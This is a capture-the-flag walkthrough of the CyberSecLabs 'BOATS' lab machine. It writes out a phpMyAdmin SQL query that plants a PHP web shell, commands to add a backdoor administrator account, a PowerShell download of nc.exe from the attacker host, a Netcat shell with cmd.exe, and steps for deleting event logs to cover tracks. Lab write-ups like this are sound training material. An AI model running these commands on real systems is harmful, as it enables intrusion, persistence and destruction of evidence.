CyberSecLabs "BOATS" Windows Challenge Without Metasploit - Privesc Edition
Today we are going to go over the newly released "BOATS" Windows machine from CyberSecLabs. This is another excellent release, and has a few different ways to machine takeover. With that, I've decided going forward that each guide will have include post-exploitation tasks, which is usually overlooked in CTF walkthroughs, despite being one of the most important things we do in pentesting. As with my last several guides, this one will also be done without utilizing Metasploit, although none of the paths to completion on this machine actually would need it. So sit back, start up your BOATS machine over at https://cyberseclabs.co.uk and let's get to work.
Scanning
As always, let's get a quick look at our attack surface on the machine. As we can see, we have several ports open. We will need to run our Nmap -A scan as well to gather some more information.
nmap 172.31.1.14
nmap -A 172.31.1.14
As we can see this is a machine that is clearly running some sort of website. We can see the server is running on Apache, that there appears to be PHP running, as well as WordPress present. Additionally we see that SMB is running, a MySQL server, and RDP. A quick look at the website shows us something about battleships, and a lot of other things going on.
Enumeration
Now that we have a basic understanding of our attack surface, we should run a directory scan to see what it is we have available. We can use Gobuster for this.
./gobuster dir -u 172.31.1.14 -w /root/desktop/directories/directory-list-2.3-small.txt
As expected we are picking up a bunch of web server specific subdirectories, including one named phpmyadmin. Let's check that one out first by visiting 172.31.1.14/phpmyadmin.
Unrestricted phpMYADMIN page
What we see isn't good. the phpMYADMIN page does not require any user credentials to access, and we can tell that we are running as the root user for the service. Additionally, we see a link on the left called named "wordpress." This will most likely pertain to the WordPress service running. Let's check that next.
wp_users Table in the wordpress database
Clicking on the wp_users table we are able to see that the user james exists, along with what looks like a PHP password hash. For now we will hold off on cracking passwords until we've exhausted all other access options. Let's do some research quick and see if we are able to exploit phpMYADMIN. Specifically, let's search if it's possible to inject code to open a command shell.
Searching for phpadmin reverse shell
We can quickly discover that there is a way for us to inject a basic PHP page into the server that will allow us to run command line functions from the address bar. Let's give it a try.
Exploitation
We will need to navigate to the WordPress database we discovered, and utilizing the SQL tab at the top of the dashboard, insert the code found in the following image. This will create a PHP page on the server that will allow us to issue commands from the address bar. Here's how.
SELECT "<?php system($_GET['cmd']; ?>" into outfile "C:\\xampp\htdocs\\backdoor.php"
We may or may not receive confirmation that it was successful after pressing the Go button, however if we attempt to issue the command again it will notify you if it was already successful. In this case, it was, and we now have our backdoor installed. If we type in 172.31.1.14/backdoor.php?cmd= followed by our desired command, we will have a limited shell access to the machine. In this case, we run whoami, and see a terrible mistake was made by the System Administrator. We have system privileges.
172.31.1.14/backdoor.php?cmd=whoami
We can prepare for pivoting by using the backdoor to create a new user for us to utilize in the near future, as well as show proof of exploit that we have compromised the administrator and the machine.
net users themayor passredacted /add
We don't want to work out of the command line for long as it is tedious and our ability to function is limited. So let's grab a Netcat binary from our machine to use for initial persistence and ease of access. We can do this by utilizing a Python SimpleHTTPServer and PowerShell wget commands. Here's how.
Bottom - python -m SimpleHTTPServer 8181 (from your NC.exe binary location); Top - powershell -c wget "http://10.10.0.14:8181/nc.exe" -outfile "nc.exe"
We can see from the Python server results that nc.exe has transferred. Let's confirm quick. We can do that by running "dir" in the backdoor.
172.31.1.14/backdoor.php?cmd=dir
As we can see the transfer has occurred successfully, and we have a Netcat binary located on the target machine. We can now send our final backdoor command by running nc.exe as a listener, and sending a connection request from our attack machine. This is successful as seen below.
Top - nc.exe -nlvp 4444 -e cmd.exe ; Bottom - nc 172.31.1.14 4444
Now that we have a proper shell we can get to work finishing the CTF portion of the machine by gathering the flags in their normal spots. In this case, james is our user.
Access.txt flag located in user "james" Desktop directory
System.txt flag located in the Administrator's Desktop directory
For those only interested in gaining access to the flags for the CTF, your job here is officially done. However, if you want to continue on and gain access to the Windows Server 2012 environment that is running, please continue on.
Post Exloitation
For those who are continuing on, thanks for joining in! Post Exploitation is something completely looked past in almost all walkthroughs, to include mine (until now). Post exploitation tasks include gaining persistence on the machine, continued elevation of privileges until server or domain takeover/compromise, and depending on the engagement, clearing or poisoning log entries to hide access. We will briefly cover log manipulation as that is geared more towards the more advanced red-teaming engagement task work, however we will do some.
Earlier we saw that I had created a user to show proof of exploit. This can also be leveraged for persistent access to the machine as well. Being as we have access to a system user, we are able to add our user to the Adminstrators localgroup.
net localgroup "administrators" themayor /add
From here we can try to gain access to a Desktop interface using "xfreerdp." We can do so using the following command in the image below. (If this doesn't work, you might have to add your created user to the "Remote Desktop users" localgroup as we did above with Administrators).
xfreerdp /u:themayor /p:passredacted /v:172.31.1.14
This command works without additional modification and we are connected to the Remote Desktop environment.
Remote Desktop Environment - Windows 12 Server
We can click on the Windows Server icon in the bottom left corner next to the Windows menu to open the Windows Server control environment. Navigating to the tools menu in the top right and clicking Computer Management, we can see that we have access to the entire management infrastructure for the machine.
Administrator Users Group
It is at this point that you would want to review your Rules of Engagement, and consider contacting your point of contact for the project. This has shown that a significant vulnerability to the environment, and a critical security concern exists.
If you are working internally as part of a "red-team," you may consider additional actions as well to cover your tracks. One of these is log manipulation. We currently have full access to the server, and it is likely any skilled security team has figured this out. However, in the case that they haven't, you can take several actions, however we will only cover one here today.
As we have compromised the server and hold administrator privileges, that means we also have the ability to modify the Administrator as well (again, check your ROE first to ensure this is acceptable). If permitted, you can change the password to something you know, and then pivot from your account to the administrator. From here we can go to the Event Viewer -> Windows Logs, and manipulate these by deleting evidence of your activities on your created account.
Example logs from the created user administrator
Administrator Deleting logs pertaining to the created user
Final Thoughts
Today we have covered the complete exploitation of a Windows Server, where our initial exploitation vector was an insecure phpMYADMIN service. This box has another known vulnerability which I will not disclose here, however I welcome you to enumerate some of the other services we didn't cover today in attempts to find it. I hope this guide helps you on your way, and thanks for stopping in!
Comments